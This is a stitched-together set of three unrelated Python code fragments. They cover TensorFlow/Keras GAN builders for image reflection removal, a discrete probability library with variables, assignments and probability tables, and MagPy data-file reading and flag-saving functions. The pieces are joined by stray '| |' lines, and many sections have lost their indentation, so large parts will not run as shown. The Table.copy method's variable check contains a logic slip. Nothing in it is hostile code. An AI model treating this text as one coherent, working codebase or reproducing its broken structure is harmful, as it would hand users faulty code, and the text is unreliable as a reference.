inp, noise = tf.split(input_layer, [3, noise_dim], axis=3)
# 256 -> 128
ds1 = Component.get_conv_block(noise_dim, 128)(noise)
# 128 -> 64
ds2 = Component.get_conv_block(128, 256)(ds1)
# 64 -> (32, 32, 128) (32, 32, 3, 3)
ds3 = Component.get_conv_block(256, 64)(ds2)
ds4 = Component.get_conv_block(64, 1)(ds3)
fl = layers.Flatten()(ds4)
ker = layers.Dense(32 * 32 * 3 * 3, activation='relu')(fl)
# mask: 256, 256
mask = Component.get_deconv_block(128, 3)(ds1)
kernel = tf.reshape(ker, [32, 32, 3, 3])
blurred_R = tf.nn.conv2d(inp, kernel, strides=[1, 1, 1, 1], padding='SAME')
blurred_R = layers.multiply([blurred_R, mask])
return keras.Model(input_layer, blurred_R)
@staticmethod
def build_multimodal_D(img_size=256):
"""
build the discriminator model for multi-modal gan.
:param img_size: image size for synthetic image S and noise
:return: two tf.keras.Model objects.
"""
input_layer = tf.keras.layers.Input(shape=(img_size, img_size, 6))
d1 = tf.keras.Sequential([tf.keras.layers.AveragePooling2D(pool_size=(3, 3), strides=2),
Component.get_conv_block(6, 32, norm=False),
Component.get_conv_block(32, 64),
Component.get_conv_block(64, 128),
Component.get_conv_block(128, 256, s=1),
Component.get_conv_block(256, 1, s=1, norm=False, non_linear='none')
])
d2 = tf.keras.Sequential([Component.get_conv_block(6, 64, norm=False),
Component.get_conv_block(64, 128),
Component.get_conv_block(128, 256),
Component.get_conv_block(256, 1, norm=False, non_linear='none')])
out1 = d1(input_layer)
out2 = d2(input_layer)
return tf.keras.Model(input_layer, (out1, out2))
@staticmethod
def build_multimodal_G(img_size=256, noise_dim=4):
"""
build the generator model
:param img_size: image size for reflection image R, transmission layer T
:param noise_dim: noise_dim to concat with the input image (T, R)
:return: tf.keras.Model object. The generator model accept a 4-D tensor with the shape
(Batch_size, img_size, img_size, 3 + 3 + noise_dim)
noted that channel 3 + 3 means the RGB channels for image T and R
channel noise_dim means the noise channel
"""
in_layer = tf.keras.layers.Input(shape=(img_size, img_size, 3 + noise_dim))
ds1 = Component.get_conv_block(3 + noise_dim, 32, norm=False)(in_layer)
ds2 = Component.get_conv_block(32, 64)(ds1)
ds3 = Component.get_conv_block(64, 128)(ds2)
ds4 = Component.get_conv_block(128, 256)(ds3)
ds5 = Component.get_conv_block(256, 256)(ds4)
ds6 = Component.get_conv_block(256, 256)(ds5)
us1 = Component.get_deconv_block(256, 256)(ds6)
us2 = Component.get_deconv_block(512, 256)(tf.concat([us1, ds5], axis=3))
us3 = Component.get_deconv_block(512, 128)(tf.concat([us2, ds4], axis=3))
us4 = Component.get_deconv_block(256, 64)(tf.concat([us3, ds3], axis=3))
us5 = Component.get_deconv_block(128, 32)(tf.concat([us4, ds2], axis=3))
out_layer = Component.get_deconv_block(64, 3, norm=False, non_linear='tanh')(tf.concat([us5, ds1], axis=3))
return tf.keras.Model(in_layer, out_layer)
@staticmethod
def build_optical_synthesis_generator(img_size=256, noise_dim=4):
"""
build the generator model that use the conventional reflection synthetic model.
the generator with the optical synthesis prior will only accept a noise-map from the encoder and convert it to
an (1) alpha blending mask for fusing the transmission layer T and reflection layer R. (2) convolution kernel
that blurs the reflection layer
:param img_size: image size for reflection image R, transmission layer T
:param noise_dim: noise_dim to concat with the input image (T, R)
:return: tf.keras.Model object. The generator model accepts three 4-D tensors: (1) T. (2) R. (3) noise layer.
The generator model will output two tensors:
(1) [alpha_blending_mask] with (256, 256, 3) for mixing two layers.
(2) [conv-kernel] used for blurring the reflection layer.
"""
in_layer = tf.keras.layers.Input(shape=(img_size, img_size, 3 + 3 + noise_dim))
# noise_in = tf.keras.layers.Input(shape=(img_size, img_size, noise_dim))
# T_in = tf.keras.layers.Input(shape=(img_size, img_size, 3))
# R_in = tf.keras.layers.Input(shape=(img_size, img_size, 3))
# split the input tensor
T_in, R_in, noise_in = tf.split(in_layer, [3, 3, noise_dim], axis=3)
ds1 = Component.get_conv_block(noise_dim, 32, norm=False)(noise_in)
ds2 = Component.get_conv_block(32, 64)(ds1)
ds3 = Component.get_conv_block(64, 128)(ds2) # d3: (32, 32)
ds4 = Component.get_conv_block(128, 256)(ds3)
ds5 = Component.get_conv_block(256, 256)(ds4)
ds6 = Component.get_conv_block(256, 256)(ds5)
us1 = Component.get_deconv_block(256, 256)(ds6)
us2 = Component.get_deconv_block(512, 256)(tf.concat([us1, ds5], axis=3))
us3 = Component.get_deconv_block(512, 128)(tf.concat([us2, ds4], axis=3))
us4 = Component.get_deconv_block(256, 64)(tf.concat([us3, ds3], axis=3)) # us4: (64, 64, 64)
us5 = Component.get_deconv_block(128, 32)(tf.concat([us4, ds2], axis=3)) # us5: (128, 128, 32)
# let us handle the conv kernel first
# us5 ---conv--- (32, 32, 16) ---reshape---> (32, 32, 3, 3)
# (1, 128, 128, 32) -> (1, 64, 64, 16)
down1 = Component.get_conv_block(32, 16)(us5)
# (1, 64, 64, 16) -> (1, 32, 32, 9)
down2 = Component.get_conv_block(16, 9)(down1)
kernel = tf.reshape(down2, [32, 32, 3, 3])
# the alpha blending mask
alpha_mask = Component.get_deconv_block(64, 3, norm=False, non_linear='leaky_relu')(
tf.concat([us5, ds1], axis=3))
alpha_mask_sub = layers.subtract([tf.ones_like(alpha_mask), alpha_mask])
# alpha_mask_sub = Component.get_deconv_block(64, 3, norm=False, non_linear='leaky_relu')(
# tf.concat([us5, ds1], axis=3))
# the blurring kernel
blurred_R = tf.nn.conv2d(R_in, kernel, strides=[1, 1, 1, 1], padding='SAME')
# transmission
t_layer = layers.multiply([T_in, alpha_mask])
r_layer = layers.multiply([blurred_R, alpha_mask_sub])
out = layers.add([t_layer, r_layer])
return tf.keras.Model(in_layer, out)
@staticmethod
def build_generator(img_size=256, noise_dim=4):
"""
build the generator model
:param img_size: image size for reflection image R, transmission layer T
:param noise_dim: noise_dim to concat with the input image (T, R)
:return: tf.keras.Model object. The generator model accept a 4-D tensor with the shape
(Batch_size, img_size, img_size, 3 + 3 + noise_dim)
noted that channel 3 + 3 means the RGB channels for image T and R
channel noise_dim means the noise channel
"""
in_layer = tf.keras.layers.Input(shape=(img_size, img_size, 3 + 3 + noise_dim))
ds1 = Component.get_conv_block(3 + 3 + noise_dim, 32, norm=False)(in_layer)
ds2 = Component.get_conv_block(32, 64)(ds1)
ds3 = Component.get_conv_block(64, 128)(ds2)
ds4 = Component.get_conv_block(128, 256)(ds3)
ds5 = Component.get_conv_block(256, 256)(ds4)
ds6 = Component.get_conv_block(256, 256)(ds5)
us1 = Component.get_deconv_block(256, 256)(ds6)
us2 = Component.get_deconv_block(512, 256)(tf.concat([us1, ds5], axis=3))
us3 = Component.get_deconv_block(512, 128)(tf.concat([us2, ds4], axis=3))
us4 = Component.get_deconv_block(256, 64)(tf.concat([us3, ds3], axis=3))
us5 = Component.get_deconv_block(128, 32)(tf.concat([us4, ds2], axis=3))
out_layer = Component.get_deconv_block(64, 3, norm=False, non_linear='tanh')(tf.concat([us5, ds1], axis=3))
return tf.keras.Model(in_layer, out_layer)
@staticmethod
def build_discriminator(img_size=256):
"""
build the discriminator model for regan.
:param img_size: image size for synthetic image S
:return: two tf.keras.Model objects.
"""
input_layer = tf.keras.layers.Input(shape=(img_size, img_size, 3))
d1 = tf.keras.Sequential([tf.keras.layers.AveragePooling2D(pool_size=(3, 3), strides=2),
Component.get_conv_block(3, 32, norm=False),
Component.get_conv_block(32, 64),
Component.get_conv_block(64, 128),
Component.get_conv_block(128, 256, s=1),
Component.get_conv_block(256, 1, s=1, norm=False, non_linear='none')
])
d2 = tf.keras.Sequential([Component.get_conv_block(3, 64, norm=False),
Component.get_conv_block(64, 128),
Component.get_conv_block(128, 256),
Component.get_conv_block(256, 1, norm=False, non_linear='none')])
out1 = d1(input_layer)
out2 = d2(input_layer)
return tf.keras.Model(input_layer, (out1, out2))
@staticmethod
def build_encoder(img_size=256, noise_dim=4):
"""
build the encoder model for regan.
:param img_size: image size for synthetic image S, transmission layer T and reflection layer R.
:param noise_dim: noise dimension that the encoder will predict.
:return: tf.keras.Model objects.
"""
input_layer = tf.keras.layers.Input(shape=(img_size, img_size, 3 + 3 + 3))
conv = tf.keras.layers.Conv2D(64, kernel_size=4, strides=2, padding='same')
res_block = tf.keras.Sequential([Component.get_res_block(64, 128),
Component.get_res_block(128, 192),
Component.get_res_block(192, 256),
Component.get_res_block(256, 256)])
pool_block = tf.keras.Sequential([tf.keras.layers.LeakyReLU(),
tf.keras.layers.AveragePooling2D(pool_size=(8, 8), padding='same')])
flatten = tf.keras.layers.Flatten()
fc_mu = tf.keras.layers.Dense(noise_dim)
fc_logvar = tf.keras.layers.Dense(noise_dim)
out = conv(input_layer)
out = res_block(out)
out = pool_block(out)
out = flatten(out)
mu = fc_mu(out)
log_var = fc_logvar(out)
return tf.keras.Model(input_layer, (mu, log_var))
class PerceptionRemovalNetworks:
    """Model builders for the perception-based reflection removal approach."""
    @staticmethod
    def build_discriminator(img_size=256):
        # Fully convolutional PatchGAN-style discriminator over a 6-channel
        # input (presumably two RGB images stacked - TODO confirm with callers).
        # NOTE(review): img_size is unused; the InputLayer is shape (None, None, 6).
        model = keras.Sequential()
        model.add(layers.InputLayer(input_shape=(None, None, 6)))
        # layer 1
        model.add(PerceptionRemovalModelComponent.get_conv_block(64, 2, non_linear='leaky_relu'))
        # layer 2
        model.add(PerceptionRemovalModelComponent.get_conv_block(128, 2, non_linear='leaky_relu'))
        # layer 3
        model.add(PerceptionRemovalModelComponent.get_conv_block(256, 2, non_linear='leaky_relu'))
        # layer 4
        model.add(PerceptionRemovalModelComponent.get_conv_block(512, 1, non_linear='leaky_relu'))
        # final layer: single-channel sigmoid patch scores
        model.add(layers.ZeroPadding2D(padding=(1, 1)))
        model.add(layers.Conv2D(filters=1, kernel_size=(4, 4), strides=(1, 1), kernel_initializer=keras.
                                initializers.random_normal(0, 0.02), activation='sigmoid'))
        return model
    @staticmethod
    def build_rm_model():
        # Fully convolutional removal network. The second argument of
        # get_conv_BN_block grows 1..64 and then resets - presumably a dilation
        # rate giving an increasing receptive field (confirm in Component).
        # NOTE(review): 1475 input channels suggests RGB concatenated with
        # pre-extracted (e.g. VGG hypercolumn) features - confirm with callers.
        inputs = keras.Input(shape=(None, None, 1475), name="image_input")
        model = keras.Sequential()
        model.add(inputs)
        model.add(PerceptionRemovalModelComponent.get_conv_BN_block(1, 1))
        model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 1))
        model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 2))
        model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 4))
        model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 8))
        model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 16))
        model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 32))
        model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 64))
        model.add(PerceptionRemovalModelComponent.get_conv_BN_block(3, 1))
        # 6 output channels (presumably predicted transmission + reflection RGB).
        model.add(layers.Conv2D(filters=6, kernel_size=(1, 1), padding='same'))
        return model
class BidirectionalRemovalNetworks:
@staticmethod
def build_vanilla_generator():
inputs = keras.Input(shape=(256, 256, 3))
# the input layer
x = layers.Conv2D(filters=64, kernel_size=(4, 4), padding='same')(inputs)
x = layers.LeakyReLU()(x)
c1 = BidirectionalRemovalComponent.get_conv_block(512, 2)(x)
c2 = BidirectionalRemovalComponent.get_conv_block(256, 2)(c1)
c3 = BidirectionalRemovalComponent.get_conv_block(128, 2)(c2)
c4 = BidirectionalRemovalComponent.get_conv_block(64, 2)(c3)
c5 = BidirectionalRemovalComponent.get_conv_block(32, 2)(c4)
c6 = BidirectionalRemovalComponent.get_conv_block(16, 2)(c5)
c7 = BidirectionalRemovalComponent.get_conv_block(8, 2)(c6)
d1 = BidirectionalRemovalComponent.get_deconv_block(8, 2)(c7)
| |
# discrete_probability/__init__.py
__version__ = '0.10dev-8f143b8'
from collections import namedtuple
from decimal import Decimal
from math import log
from random import random, randint
from sys import float_info
################################################################################
# Utilities
################################################################################
def weighted_choose(weighted_choices):
    """Draw one choice from (weight, choice) pairs whose weights sum to one."""
    remaining = random()
    for weight, choice in weighted_choices:
        if remaining > weight:
            # Not this bucket; consume its probability mass and move on.
            remaining -= weight
            continue
        return choice
    raise ValueError('Total probability of choices does not sum to one.')
def data_to_assignments(header, samples):
    """Convert raw sample rows into Assignment objects.

    :param header: sequence of variables, one per column of each sample
        (presumably Variable instances - they are passed to SingleAssignment).
    :param samples: iterable of rows; a None entry marks missing data and is
        dropped from the resulting assignment.
    :return: list of Assignment objects, one per sample row.
    """
    sample_assignments = []
    for sample in samples:
        # Pair each variable with its observed value, skipping missing (None)
        # entries.  (The old `not x[1] == None` filter is replaced by the
        # idiomatic `is not None` test.)
        single_assignments = [SingleAssignment(variable, value)
                              for variable, value in zip(header, sample)
                              if value is not None]
        sample_assignments.append(Assignment(single_assignments))
    return sample_assignments
class Query():
    """A probabilistic query P(query | given).

    *query* and *given* are sequences whose entries are either bare Variables
    (marginal targets) or SingleAssignments (fixed values).  Derived variable
    lists and query-type flags are refreshed whenever either part is
    reassigned through the properties.
    """
    def __init__(self, query, given=None):
        # given previously defaulted to a shared mutable list ([]); None keeps
        # all call sites working while avoiding that pitfall.
        self._query = query
        self._given = [] if given is None else given
        self._update()
    def __str__(self):
        return '{:} | {:}'.format(', '.join([str(x) for x in self._query]), ', '.join([str(x) for x in self._given]))
    def __repr__(self):
        return str(self)
    def get_query(self):
        return self._query
    def set_query(self, value):
        self._query = value
        self._update()
    query = property(get_query, set_query)
    def get_given(self):
        return self._given
    def set_given(self, value):
        self._given = value
        self._update()
    given = property(get_given, set_given)
    def _update(self):
        """Recompute cached variable lists and query-type flags."""
        # Each entry is either a Variable itself or a SingleAssignment carrying
        # one.  The original used map()/len(filter(...)), which returned lists
        # only on Python 2; comprehensions/any() preserve those semantics and
        # also work on Python 3.
        self.query_vars = [x if isinstance(x, Variable) else x.variable for x in self._query]
        self.given_vars = [x if isinstance(x, Variable) else x.variable for x in self._given]
        self.is_marginal_query = any(isinstance(x, Variable) for x in self._query)
        self.is_conditional_query = len(self._given) > 0
        self.is_full_conditional_query = any(isinstance(x, Variable) for x in self.given)
    @staticmethod
    def from_natural(*args):
        """Build a Query from natural syntax, e.g. from_natural(A, B | C<<c, D).

        The single (query_part | given_part) tuple produced by __or__ acts as
        the separator between the query and given portions.
        """
        args = list(args)
        # The separator is the one entry that is neither a SingleAssignment nor
        # a Variable (i.e. the tuple produced by __or__).
        separators = [(i, x) for i, x in enumerate(args)
                      if not (isinstance(x, SingleAssignment) or isinstance(x, Variable))]
        if not separators:
            return Query(args, [])
        separator_index = separators[0][0]
        query = args[0:separator_index] + [args[separator_index][0]]
        given = [args[separator_index][1]] + args[separator_index + 1:]
        return Query(query, given)
################################################################################
# Discrete random variables
################################################################################
class Variable():
    """A named discrete random variable over a fixed, finite set of values.

    Iterating or indexing a Variable yields its SingleAssignments;
    ``v << value`` builds one explicitly, and ``a > b`` / ``a < b`` build
    DirectedEdges for graph construction.
    """
    def __init__(self, name, values=(True, False), description=''):
        self.name = name
        self.description = name if description == '' else description
        self.values = values
        # Reject the reserved value before building assignments (fail fast).
        if None in self.values:
            raise ValueError('Cannot use None as a value. None is reserved for missing data.')
        self.assignments = tuple(self << value for value in self.values)
    def __len__(self):
        return len(self.values)
    def __getitem__(self, key):
        return self.assignments[key]
    def __iter__(self):
        return iter(self.assignments)
    def __str__(self):
        return self.name
    def __repr__(self):
        return str(self)
    def column_width(self):
        """Return the print width needed for this variable's name or widest value."""
        # The previous max(*[...]) form raised TypeError for single-value
        # variables (max(*[n]) degenerates to max(n)); a generator is safe.
        return max(len(str(self)), max(len(str(value)) for value in self.values))
    def __lt__(self, other):
        if isinstance(other, Variable):
            return DirectedEdge(other, self)
        raise ValueError('Expecting Variable.')
    def __gt__(self, other):
        if isinstance(other, Variable):
            return DirectedEdge(self, other)
        raise ValueError('Expecting Variable.')
    def __or__(self, other):
        # (query | given) separator tuple used by Query.from_natural.
        return (self, other)
    def __lshift__(self, other):
        if other not in self.values:
            raise ValueError('Assigned value is not valid for this variable: {:} not in {:}.'.format(other, self.values))
        return SingleAssignment(self, other)
BaseAssignment = namedtuple('BaseAssignment', ['variable', 'value'])
class SingleAssignment(BaseAssignment):
def __init__(self, variable, value):
super(SingleAssignment, self).__init__(variable, value)
if not value in variable.values:
raise ValueError('Assigned incompatible value to variable. Value {1} not in {2} for variable {0}.'.format(variable, value, str(variable.values)))
def __str__(self):
return '{!s}={!s}'.format(self.variable, self.value)
def __repr__(self):
return str(self)
def __or__(self, other):
return (self, other)
class Assignment(frozenset):
    """A frozenset of SingleAssignments: a (possibly partial) joint assignment."""
    def __new__(_cls, single_assignments):
        if isinstance(single_assignments, SingleAssignment):
            return frozenset.__new__(_cls, [single_assignments])
        # Materialize first: the input may be a one-shot iterator, and the old
        # len(filter(...)) validation was Python-2-only (filter objects have no
        # len() on Python 3).
        single_assignments = list(single_assignments)
        if any(not isinstance(x, SingleAssignment) for x in single_assignments):
            raise ValueError('Assignments can only be made from SingleAssignments.')
        return frozenset.__new__(_cls, single_assignments)
    def __str__(self):
        return '({:})'.format(', '.join([str(x) for x in self]))
    def __repr__(self):
        return str(self)
    def consistent_with(self, other):
        """True when no variable gets two different values across self and other."""
        return len(self.union(other)) == len(self.union(other).get_variables())
    def project(self, variables):
        """Restrict this assignment to the given variables."""
        return Assignment([x for x in self if x.variable in variables])
    def get_variable(self, variable):
        """Return the SingleAssignment for *variable*.

        Raises IndexError when absent - kept from the original (Python 2)
        filter(...)[0] behaviour, which breaks on Python 3.
        """
        return [x for x in self if x.variable == variable][0]
    def get_variables(self):
        return frozenset([x.variable for x in self])
    def ordered(self, order):
        return tuple(self.get_variable(variable) for variable in order)
    def ordered_values(self, order):
        return tuple(self.get_variable(variable).value for variable in order)
    def complete(self, variables):
        """All full assignments over *variables* consistent with this one."""
        return Assignment.generate(set(variables).difference(self.get_variables()), list(self))
    def complete_partials(self, variables):
        """All assignments over the variables not already assigned here."""
        return Assignment.generate(set(variables).difference(self.get_variables()), [])
    @staticmethod
    def generate(variables, trace=None):
        """Enumerate every joint assignment of *variables*, each extending *trace*."""
        # trace previously had a mutable default ([]); it is never mutated in
        # place, but None is the safe spelling.
        trace = [] if trace is None else trace
        variables = list(variables)
        if len(variables) == 0:
            return [Assignment(trace)]
        variable, rest = variables[0], variables[1:]
        traces = []
        for value in variable.values:
            traces.extend(Assignment.generate(rest, trace + [SingleAssignment(variable, value)]))
        return traces
Assignment.empty = Assignment(())
################################################################################
# Number systems
################################################################################
# Each number system is a (zero, one, converter) triple selecting the
# arithmetic domain used for probabilities (see Table.set_number_system).
float_number_system = (0.0, 1.0, float)
decimal_number_system = (Decimal('0'), Decimal('1'), Decimal)
try:
    from sympy import S
    sympy_number_system = (S('0'), S('1'), S)
    sympy_float_number_system = (S('0.0'), S('1.0'), S)
except ImportError:
    # sympy is optional; the sympy-backed number systems are simply absent.
    pass
################################################################################
# Discrete probability tables
################################################################################
# TODO: These tables should really be numeric arrays with a function to
# transform Assignments to indices.
# TODO: All of these if statements to perform a different operation depending
# on whether the table is marginal or not might be best done by simply
# reassigning the methods on initialization since a table cannot change its own
# type.
class Table():
def __init__(self, variables, context_variables=(), context='', ignore_validity=False, number_system=float_number_system):
self.variables = frozenset(variables)
self.context_variables = frozenset(context_variables)
self.all_variables = self.variables.union(self.context_variables)
self.context = context
if self.context == '':
self.context = str(tuple(self.context_variables))[1:-1]
self.ignore_validity = ignore_validity
self.set_number_system(number_system)
if len(self.variables.intersection(self.context_variables)) > 0:
raise ValueError('Context variables and table variables cannot overlap: {:} exists in both {:} and {:}.'.format(self.variables.intersection(self.context_variables), self.variables, self.context_variables))
self.is_conditional_table = len(self.context_variables) > 0
self.is_marginal_table = len(self.context_variables) == 0
self.assignments = Assignment.generate(self.variables)
self.context_assignments = Assignment.generate(self.context_variables)
self.all_assignments = Assignment.generate(self.variables.union(self.context_variables))
self._entries = {}
if self.is_marginal_table:
for assignment in self.assignments:
self._entries[assignment] = None
else:
for context_assignment in self.context_assignments:
self._entries[context_assignment] = Table(self.variables, (), str(context_assignment)[1:-1], ignore_validity=self.ignore_validity, number_system=self.number_system)
# REPRESENTATIONS
def __str__(self):
context_column_widths = [variable.column_width() for variable in self.context_variables]
column_widths = [variable.column_width() for variable in self.variables]
if self.is_marginal_table:
out_string = '{:} | P({:}{:})\n'.format(
' | '.join([str(variable).ljust(column_widths[i]) for i, variable in enumerate(self.variables)]),
','.join([str(variable) for variable in self.variables]),
'|{:}'.format(self.context) if not self.context == '' else '')
out_string += '-'*len(out_string) + '\n'
for assignment in self.assignments:
for i, variable in enumerate(self.variables):
out_string += str(assignment.get_variable(variable).value).ljust(column_widths[i]) + ' | '
out_string += '{:}\n'.format(self._entries[assignment])
else:
out_string = '{:} || {:} | P({:}|{:})\n'.format(' | '.join([str(variable).ljust(context_column_widths[i]) for i, variable in enumerate(self.context_variables)]), ' | '.join([str(variable).ljust(column_widths[i]) for i, variable in enumerate(self.variables)]), ','.join([str(variable) for variable in self.variables]), ','.join([str(variable) for variable in self.context_variables]))
out_string += '-'*len(out_string) + '\n'
for context_assignment in self.context_assignments:
context_table = self._entries[context_assignment]
for assignment in context_table.assignments:
out_string += ' | '.join([str(context_assignment.get_variable(variable).value).ljust(context_column_widths[i]) for i, variable in enumerate(self.context_variables)])
out_string += ' || '
out_string += ' | '.join([str(assignment.get_variable(variable).value).ljust(column_widths[i]) for i, variable in enumerate(self.variables)])
out_string += ' | '
out_string += '{:}\n'.format(context_table[assignment])
return out_string[:-1]
def __repr__(self):
return str(self)
# BASIC OPERATIONS
def __getitem__(self, key):
key = Assignment(key)
assignment = key.project(self.variables)
context_assignment = key.project(self.context_variables)
if self.is_marginal_table:
return self._entries[assignment]
else:
return self._entries[context_assignment][assignment]
def __setitem__(self, key, value):
key = Assignment(key)
assignment = key.project(self.variables)
context_assignment = key.project(self.context_variables)
if self.is_marginal_table:
self._entries[assignment] = value
else:
self._entries[context_assignment][assignment] = value
def get_number_system(self):
return self.zero, self.one, self.make_number
def set_number_system(self, value):
self.zero, self.one, self.make_number = value
number_system = property(get_number_system, set_number_system)
def total_probability(self):
if not self.is_marginal_table:
raise ValueError('Operation only valid for marginal tables.')
return sum(self._entries.values())
def get_is_valid(self, epsilon=0.0000000000000004):
if self.is_marginal_table:
if None in self._entries.values():
return False
if epsilon == 0 or self.make_number != float:
if not self.total_probability() == self.one:
return False
else:
if abs(self.one - self.total_probability()) > epsilon:
return False
else:
for context_assignment in self.context_assignments:
if not self._entries[context_assignment].is_valid:
return False
return True
is_valid = property(get_is_valid)
def copy(self, other):
'''
Copies the entries from another table. This requires that the other
table share the same variables as this one.
Raises a KeyError if the tables do not share the same variables.
'''
if not self.variables == other.variables and self.context_variables == other.context_variables:
raise KeyError('Cannot copy from table that does not have the same variables.')
if self.is_marginal_table:
for assignment in self.assignments:
self._entries[assignment] = other._entries[assignment]
else:
for context_assignment in self.context_assignments:
self._entries[context_assignment].copy(other._entries[context_assignment])
return self
def randomize(self):
'''
Randomizes the table entries.
If the table is a marginal table then it assigns a random value from a
uniform distribution in [0, 1] to each entry and then normalizes the
table.
If the table is a conditional table then it simply calls randomize on
all context tables.
The function returns the instance.
'''
if self.is_marginal_table:
for assignment in self.assignments:
self._entries[assignment] = random()
else:
for context_assignment in self.context_assignments:
self._entries[context_assignment].randomize()
self.normalize()
return self
def normalize(self):
'''
Normalizes the table.
If the table is a marginal table then it simply calculates the total
probablity and divides all entries by the total probability.
If the table is a conditional table then it simply calls normalize on
all context tables.
The function returns the instance.
'''
if self.is_marginal_table:
normalizer = self.total_probability()
for assignment in self.assignments:
self._entries[assignment] /= normalizer
else:
for context_assignment in self.context_assignments:
self._entries[context_assignment].normalize()
return self
def normalize_number_system(self):
if self.is_marginal_table:
for assignment in self.assignments:
self._entries[assignment] = self.make_number(self._entries[assignment])
else:
for context_assignment in self.context_assignments:
self._entries[context_assignment].normalize()
return self
# BASIC PROBABILISTIC OPERATIONS
def marginalize_out(self, variables):
if not self.is_marginal_table:
| |
not be read. Skipping ...".format(filename))
if (len(stp) > 0 and not np.isnan(stp[0].time)) or len(stp.ndarray[0]) > 0: # important - otherwise header is going to be deleted
st.extend(stp.container,stp.header,stp.ndarray)
#del stp
if st.length()[0] == 0:
# try to give more specific information why the stream is empty
if has_magic(pathname) and not glob(pathname):
logger.error("read: No file matching file pattern: %s" % pathname)
raise Exception("Cannot read non-existent file!")
elif not has_magic(pathname) and not os.path.isfile(pathname):
logger.error("read: No such file or directory: %s" % pathname)
raise Exception("Cannot read non-existent file!")
# Only raise error if no starttime/endtime has been set. This
# will return an empty stream if the user chose a time window with
# no data in it.
# XXX: Might cause problems if the data is faulty and the user
# set starttime/endtime. Not sure what to do in this case.
elif not 'starttime' in kwargs and not 'endtime' in kwargs:
logger.error("read: Cannot open file/files: %s" % pathname)
elif 'starttime' in kwargs or 'endtime' in kwargs:
logger.error("read: Cannot read data. Probably no data available in the time range provided!")
raise Exception("No data available in time range")
else:
logger.error("read: Unknown error occurred. No data in stream!")
raise Exception("Unknown error occurred during reading. No data in stream!")
if headonly and (starttime or endtime):
msg = "read: Keyword headonly cannot be combined with starttime or endtime."
logger.error(msg)
# Sort the input data regarding time
if not skipsorting:
st = st.sorting()
# eventually trim data
if starttime:
st = st.trim(starttime=starttime)
if endtime:
st = st.trim(endtime=endtime)
### Define some general header information TODO - This is done already in some format libs - clean up
st.header['DataSamplingRate'] = float("{0:.2f}".format(st.samplingrate()))
return st
#@uncompressFile
def _read(filename, dataformat=None, headonly=False, **kwargs):
    """
    Reads a single file into a MagPy DataStream object.
    Internal function only.

    :param filename: path of the file to read
    :param dataformat: explicit format name; if None every entry of
        PYMAG_SUPPORTED_FORMATS is probed in order until one matches
    :param headonly: if True only header information is read
    :return: DataStream (an empty placeholder stream if no format matched)
    :raises TypeError: when *dataformat* is given but not supported
    """
    debug = kwargs.get('debug')
    stream = DataStream([], {})
    format_type = None
    foundapproptiate = False
    if not dataformat:
        # auto detect format - go through all known formats in given sort order
        for format_type in PYMAG_SUPPORTED_FORMATS:
            if debug:
                print("_read: Testing format: {} ...".format(format_type))
                logger.info("_read: Testing format: {} ...".format(format_type))
            if isFormat(filename, format_type):
                if debug:
                    logger.info(" -- found: {}".format(format_type))
                    print(" -- found: {}".format(format_type))
                foundapproptiate = True
                break
        if not foundapproptiate:
            # Peek at the first line to give a more helpful diagnostic.
            # (The previous open(...).readline() leaked the file handle.)
            with open(filename, 'rt') as fh:
                temp = fh.readline()
            if temp.startswith('# MagPy Absolutes'):
                logger.warning("_read: You apparently tried to open a DI object - please use the absoluteAnalysis method")
            else:
                logger.error("_read: Could not identify a suitable data format")
            return DataStream([LineStruct()], {}, np.asarray([[] for el in KEYLIST]))
    else:
        # format given via argument
        dataformat = dataformat.upper()
        try:
            formats = [el for el in PYMAG_SUPPORTED_FORMATS if el == dataformat]
            format_type = formats[0]
        except IndexError:
            msg = "Format \"%s\" is not supported. Supported types: %s"
            logger.error(msg % (dataformat, ', '.join(PYMAG_SUPPORTED_FORMATS)))
            raise TypeError(msg % (dataformat, ', '.join(PYMAG_SUPPORTED_FORMATS)))
    stream = readFormat(filename, format_type, headonly=headonly, **kwargs)
    return stream
def saveflags(mylist=None, path=None, overwrite=False):
    """
    DEFINITION:
        Save list e.g. flaglist to file using pickle (or json for *.json paths).
    PARAMETERS:
    Variables:
        - mylist:   (list) the flag list to store
        - path:     (str) Path to data files in form:
        - overwrite: (bool) if False, flags already stored at *path* are loaded
                     and the new list is appended to them
    RETURNS:
        - True if succesful otherwise False
    EXAMPLE:
        >>> saveflags(flaglist,'/my/path/myfile.pkl')
    """
    print("Saving flaglist ...")
    if not mylist:
        print("error 1")
        return False
    if not path:
        path = 'myfile.pkl'
    if not overwrite:
        existflag = loadflags(path)
        existflag.extend(mylist)
        mylist = existflag
    # Only create directories when the path actually contains one;
    # os.makedirs('') raised for bare filenames before.
    dirname = os.path.dirname(path)
    if dirname and not os.path.exists(dirname):
        os.makedirs(dirname)
    if path.endswith('.json'):
        print(" -- using json format ")
        try:
            import json

            def dateconv(d):
                # Converter to serialize datetime objects in json
                if isinstance(d, datetime):
                    return d.__str__()

            # Convert mylist to a dictionary keyed by the unique sensorids
            # (column 5); the sensorid column itself is dropped from each row.
            mydic = {}
            sid = list(set(elem[5] for elem in mylist))
            for s in sid:
                slist = [elem[0:5] + elem[6:] for elem in mylist if elem[5] == s]
                mydic[s] = slist
            ## Dictionary looks like {SensorID:[[t1,t2,xxx,xxx,],[x...]]}
            with open(path, 'w', encoding='utf-8') as fl:
                # json.dumps already returns str on Python 3; the former
                # unicode(...) wrapper raised NameError and made this branch
                # always fail.
                fl.write(json.dumps(mydic, default=dateconv))
            print("saveflags: list saved to a json file: {}".format(path))
            return True
        except Exception:
            return False
    else:
        print(" -- using pickle")
        try:
            # TODO: check whether package is already loaded
            from pickle import dump
            # Close the handle deterministically (was dump(..., open(...))).
            with open(path, 'wb') as fl:
                dump(mylist, fl)
            print("saveflags: list saved to {}".format(path))
            return True
        except Exception:
            return False
def loadflags(path=None, sensorid=None, begin=None, end=None):
    """
    DEFINITION:
        Load list e.g. flaglist from file using pickle (or json for *.json paths).
    PARAMETERS:
    Variables:
        - path:     (str) Path to data files in form:
        - sensorid: (str) if given, only flags of this sensor are returned
        - begin:    (datetime)
        - end:      (datetime)
    RETURNS:
        - list (e.g. flaglist); an empty list on any failure
    EXAMPLE:
        >>> loadflags('/my/path/myfile.pkl')
    """
    if not path:
        return []
    if path.endswith('.json'):
